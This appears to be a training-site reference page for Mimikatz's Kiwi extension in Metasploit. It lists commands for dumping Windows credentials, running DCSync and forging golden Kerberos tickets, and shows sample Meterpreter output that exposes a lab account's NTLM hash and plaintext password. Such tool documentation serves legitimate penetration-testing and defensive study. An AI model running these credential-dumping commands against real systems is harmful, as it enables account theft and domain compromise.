Mimikatz Kiwi – Security Slice

Description

Mimikatz is a well known tool to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets. Kiwi is the Metasploit implementation.

Platform	Windows
Author	gentilkiwi (Benjamin DELPY)
License	Creative Commons 4.0
URL	https://blog.gentilkiwi.com/mimikatz

Usage

Kiwi Commands
=============
 
    Command                Description
    -------                -----------
    creds_all              Retrieve all credentials (parsed)
    creds_kerberos         Retrieve Kerberos creds (parsed)
    creds_livessp          Retrieve Live SSP creds
    creds_msv              Retrieve LM/NTLM creds (parsed)
    creds_ssp              Retrieve SSP creds
    creds_tspkg            Retrieve TsPkg creds (parsed)
    creds_wdigest          Retrieve WDigest creds (parsed)
    dcsync                 Retrieve user account information via DCSync (unparsed)
    dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
    golden_ticket_create   Create a golden kerberos ticket
    kerberos_ticket_list   List all kerberos tickets (unparsed)
    kerberos_ticket_purge  Purge any in-use kerberos tickets
    kerberos_ticket_use    Use a kerberos ticket
    kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
    lsa_dump_sam           Dump LSA SAM (unparsed)
    lsa_dump_secrets       Dump LSA secrets (unparsed)
    password_change        Change the password/hash of a user
    wifi_list              List wifi profiles/creds for the current user
    wifi_list_shared       List shared wifi profiles/creds (requires SYSTEM)

Examples

load kiwi

This command will load the Mimikatz module in a Meterpreter session.

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
 
Success.

creds_all

This will attempt to dump all the Windows credentials from RAM.

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
 
Username  Domain         NTLM                              SHA1
--------  ------         ----                              ----
sec       SECSTUDENT     396f460962c665bc648db299d55f1ba2  4029ce95b7a89f3c63148d94e789c0350e069ef4
 
wdigest credentials
===================
 
Username        Domain         Password
--------        ------         --------
(null)          (null)         (null)
SECSTUDENT$     SEC            (null)
sec             SECSTUDENT     (null)
 
kerberos credentials
====================
 
Username        Domain         Password
--------        ------         --------
(null)          (null)         (null)
sec             SEC            sec123
secstudent$     SEC            (null)

Blog Posts